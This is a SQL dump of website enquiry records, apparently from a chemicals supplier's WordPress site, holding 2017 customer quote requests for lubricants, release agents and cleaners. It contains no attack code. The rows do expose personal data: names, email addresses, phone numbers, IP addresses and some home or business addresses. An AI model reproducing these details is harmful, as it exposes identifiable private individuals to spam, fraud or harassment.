INSERT INTO `wp_enquiry_detail_new` VALUES (1278, 'Tony Pisani', 'tonypisaniinc@sbcglobal.net', 'Dear Madam or Sir,\nKindly advise price, weight, freight and delivery cost for a quantity of six KRYTOX 0.5 KG to 3321 Ridgeview Drive  El Dorado Hills, CA 95762.\n\nThank you,\n\nTonyP', '916390-6335', 'SIX KRYTOX 0.5 KG', '67.174.37.55', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-25 14:08:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1279, 'Shane McCoy', 'smccoy@atricure.com', 'I am interested in how this flux remover is applied (do you just spray it on and it works, do you wipe it on, etc.?). Also, I was hoping you could supply me with pricing for the various forms it comes in.\n\nThanks,', '', 'Flux Cleaner', '207.250.46.226', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1693";s:5:"title";s:39:"H0805A &#038; H0B05B Flux Remover Spray";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-25 15:52:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1280, 'Chenxu Wang', 'chenxu_wang@tamu.edu', 'How much if I order 5-ish bottles of MS-122AD? Do you have any academic discount? Thank you!', '979676-3205', '', '165.91.12.212', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-25 16:20:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1281, 'Glenn Davis ', 'glenndee203@hotmail.com', 'Hello, My name is: Glenn Davis and I am the person in charge of doing the Electronic Maintenance , Preventative Maintenance and Repair of our church\'s Audio Sound System and I\'m interesting purchasing some of your products to do the maintenance on our equipment. Would you be willing to send me a variety of your products pertaining to the servicing of all types of electronic audio equipment which includes Audio Speakers, Audio Sound Mixers . My address is: 945 Taylors Rd., Boones Mill, VA 24065', '540397-0159', 'Variety Sample Package Request ', '24.149.84.143', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1836";s:5:"title";s:7:"MS-538N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/electrical-contact-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 08:13:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1282, 'Josip', 'josip.mestrovic@alphachrom.hr', 'Can you send me a quote for 10 pcs of Aero Duster?\nKind regards\nJosip', '', 'MS-222N Aero Duster', '213.202.103.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 08:30:10', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1283, 'Chris Schwab', 'cschwab@exostatmedical.com', 'What are the prices for 1 quart and 1 gallon containers of the MS-143AX Universal PTFE Release Agent?\n\nThank you,\nChris', '', 'Price', '173.28.112.156', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"305";s:5:"title";s:39:"MS-143AX | Universal PTFE Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143AX-.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 15:00:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1284, 'Henry Sodano', 'hsodano@gmail.com', 'Could you provide a quote for a gallon of EPON 862 and the required amount of EPICURE W?\n', '480205-1202', 'EPIKURE W and 862', '35.0.61.91', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 16:14:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1285, 'Joy Lay', 'lay.je@pg.com', 'Hello, \n\nI need to get a price quote on two cases of MS-242-N Quik Freeze.\n\nThanks!', '513945-0346', 'Need to order MS-242N Quik Freeze', '104.129.194.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 17:31:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1286, 'Bob Pomicpic', 'bobp@therm-x.com', 'Looking for a bath style material to remove solder flux on copper solid wire.', '510566-1184', 'flux remover', '207.141.15.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1693";s:5:"title";s:39:"H0805A &#038; H0B05B Flux Remover Spray";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 18:02:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1287, 'Bernard Ecker', 'bernard.ecker@ngc.com', 'Need is for internal small lab. What is minimum quantity?', '818715-5177', 'MS-122AD PTFE Release Aerosol', '157.127.124.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 20:23:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1288, 'Christopher Haynes', 'christooherhaynes44@gmail.com', 'Need a mold release for polyurethane', '843709-6955', 'Mold Release', '172.12.219.101', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3787";s:5:"title";s:39:"ReleaSys™ HT | Boron Nitride Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/03/shutterstock_442773265.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 20:28:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1289, 'Phil Silverstein', 'phil@eta-usa.com', 'Do you have an immersion type PCA cleaning solution that is non-flammable for use in an ultrasonic cleaner? Please show me what it is, cost and availability, and useful in an ultrasonic tank? The main thing to be removed is used solder flux, sometimes rather burned in.\nPlease send me some specs on the material.\nThanks\nPhil', '408728-5041', 'PVA cleaners', '68.186.33.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1695";s:5:"title";s:33:"MS-560 &#038; MS-562 Flux Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/miller-stephenson-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 20:53:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1290, 'Alexander Sushkov', 'asu@bu.edu', 'Kindly quote MS-111, 1 bottle.\nThanks,\nAlex', '617353-2619', 'quote', '155.41.82.148', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 20:57:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1291, 'Coleman', 'cft@email.sc.edu', 'I work for the University of South Carolina as a research assistant.  I am in need of removing some ceramic pellet samples from the cured epoxy they are mounted in.  I was told this should do the trick.  ', '803240-1332', 'Interested in purchase ', '172.75.195.160', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-26 22:44:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1292, 'Julio Cancio', 'julio@gpeeng.com', 'Looking for release agent for steel molds', '305216-0929', '', '67.63.44.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4288";s:5:"title";s:39:"ReleaSys™ CR | Concrete Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-27 13:26:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1293, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'testadsas', '', 'test', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-27 18:56:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1294, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'asdasd', '', 'test', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"442";s:5:"title";s:7:"GPL 107";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-pfpe-oil-grease-gpl.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-27 18:58:30', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1295, 'mjoyner', 'mjoyner@mschem.com', 'Test', '', '', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-28 12:45:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1296, 'abel sanchez', 'abels@christmasbykrebs.com', 'please provide info on product\nwould like to know if i can receive a sample\n', '575624-2882', '', '184.155.75.184', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:39:"MS-153 | High Temperature Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-28 15:09:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1297, 'Juan Carlos Mendoza', 'jcmendoza@mission-petroleum.com', 'I am looking for a grease applicable for different equipment\'s  that work in a Thermoeletric, \nThis grease must work  with low pressure up to 500 f  grade  ', '+593998079145', 'Looking for a grease for a thermoelectric plan', '186.42.165.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"862";s:5:"title";s:10:"Krytox LVP";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_22381852.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-28 16:02:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1298, 'Andrei Isichenko', 'andrei.m.isichenko@jpl.nasa.gov', 'Hello,\n\nI am interested in purchasing Vertrel XF for cleaning optics. What is the minimum size I can purchase, and what is the price?\n\nThank you,\n\nAndrei Isichenko\nJPL', '914320-4364', 'Price quote Vertrel XF', '137.79.198.255', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-28 21:39:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1299, 'Bret Bruning', 'bretb@cos.flag.org', 'Hello, I am looking to purchase a can of MS-487G to put on the inside of some computers to reduce the EMI we are having issues with.  Can you please send me a quote or tell me where I can buy this from?\nThanks,\nBret', '', 'Quote', '207.98.208.110', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1722";s:5:"title";s:55:"RFI / EMI Nickel Conductive Coating (MS-485G / MS-487G)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_484572385.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-29 21:27:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1300, 'Jud Phillips', 'Jud@samphillipsmusicgroup.com', 'How do we order?\n', '', 'ORDER', '96.84.141.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1840";s:5:"title";s:6:"MS-738";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-30 17:43:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1301, 'Akihiko Ikeda', 'ikeda@issp.u-tokyo.ac.jp', 'Dear MS,\n\nI am Dr. A. Ikeda, a research associate in University of Tokyo, Japan.\n\nI would like to purchase this product, MS-111, but unable to find a distributer in Japan. \n\nWould you mind telling me which company can import this product to Japan. Or can I buy the product directly using a credit card of the university?\n\nSincerely yours.\nAkihiko Ikeda, \nUniversity of Tokyo', '', 'Hope to purchase MS-111 from Japan', '157.82.227.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:30:"MS-111 | Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 07:42:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1302, 'dan dillulio', 'ddillulio@mschem.com', 'test', '', 'test', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3363";s:5:"title";s:22:"H-1112B Skin Degreaser";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_280855511.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 12:53:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1303, 'dsda asdasd', 'ddillulio@mschem.com', 'asdasd', '', 'adasd', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:37:"MS-470C | Urethane Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 12:57:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1304, 'Ryan Korpiel', 'ryan.korpiel@wattfuelcell.com', 'Hello,\nI requested a quote for (4) cans of MS-460H Silicone Conformal Coating last Thursday and have not received it yet. Could you please send as soon as possible so we can place an order?\n\nThank you,\nRyan Korpiel\nSenior Systems Manufacturing Engineer\nWatt Fuel Cell Corporation\n402 East Main Street, Suite 800\nMount Pleasant, PA 15666-1687, USA\nCell: 724-516-4764\n', '', 'Waiting for quote on MS-460H', '24.239.220.185', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:37:"MS-460H | Silicone Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 12:58:01', '', NULL, '', '', '', NULL, '', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:37:"MS-460H | Silicone Conformal Coatings";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}'); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1305, 'werwe werwe r', 'ddillulio@mschem.com', 'test', '', 'Test', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:54:"VAZO 52 | 2-2&#8242;-Azobis(2,4-dimethylvaleronitrile)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:02:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1306, 'werwe wer wre', 'ddillulio@mschem.com', 'teswt', '', 'Tes', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:44:"FluoroExtreme™ Dental Handpiece Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:15:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1307, 'sdfsdfs sd fsdf', 'ddillulio@mschem.com', 'werwerwer', '', 'wwerw', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:44:"FluoroExtreme™ Dental Handpiece Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:17:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1308, 'werwe we r', 'ddillulio@mschem.com', 'werwer', '', 'werwe', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"474";s:5:"title";s:44:"FluoroExtreme™ Dental Handpiece Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/DENTAL.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:29:42', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1309, 'dfgdfg d gdfgd', 'ddillulio@mschem.com', 'dfg dfgdf', '', 'd fgdfgdfg', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3363";s:5:"title";s:22:"H-1112B Skin Degreaser";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_280855511.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:50:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1310, 'Dan Dillulio', 'ddillulio@mschem.com', 'werwerwer', '', 'werwe', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4288";s:5:"title";s:39:"ReleaSys™ CR | Concrete Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:59:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1311, 'Dan Dillulio', 'ddillulio@mschem.com', 'werwerwersdfsd', '23434234234', 'werwe', '198.0.163.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"4288";s:5:"title";s:39:"ReleaSys™ CR | Concrete Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 13:59:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1312, 'MAYDAY SOLUCIONES INTEGRALES SAC', 'maydaysolucionesintegralessac@gmail.com', 'GREASSE FOR LUBRICATE PART OXIGEN', '511 2724612', 'NRT 8908', '200.106.18.237', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"881";s:5:"title";s:8:"NRT 8908";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_18414949.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 16:38:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1313, 'Tom Good', 'tom.good@kessongood.com', 'Need a quote for a case of 12 cans MS-242N shipped to 60081. Last case we had shipped to our old location was heavily damaged. 5 out of 12 cans had their sprayers completely destroyed.', '414-704-4279', 'MS-242N', '98.206.192.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 19:34:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1314, 'Darin', 'dmichels@gibbsrubber.com', 'Looking to try new release agents for rubber molding. If you have anything you would suggest for FKM/Viton I am interested in learning about it. ', '707-746-7301', 'eLASTOMER RELEASE', '70.197.14.38', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"297";s:5:"title";s:50:"ReleaSys™ 8200 | PTFE Water-based Release Agents";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_524224879.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 20:41:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1315, 'Patrick Terrizzi', 'patrick@graphenetechnologies.com', 'Hi,\nWe purchase Hexion resin from you. We are considering purchasing Hexion Epikure W curing agent but would like to review the msds first.  \nThanks!', '415-883-7147', 'msds request', '50.247.126.113', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-07-31 22:49:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1316, 'Andrew Buffalino', 'andrew.buffalino@cookmedical.com', 'Good Morning,\n\nWe are interested in using BN as a high temperature mold release agent.  We would like a quote for a 1Qt container for development purposes.\n\nThanks,\n\nAndrew Buffalino\nResearch &amp; Development Engineer\n\nandrew.buffalino@cookmedical.com\n800-245-4707 x396217', '800-245-4707', 'MS-153A', '66.192.236.109', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:39:"MS-153 | High Temperature Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-08-01 14:09:20', '', NULL, '', '', '', NULL, '', ''); 
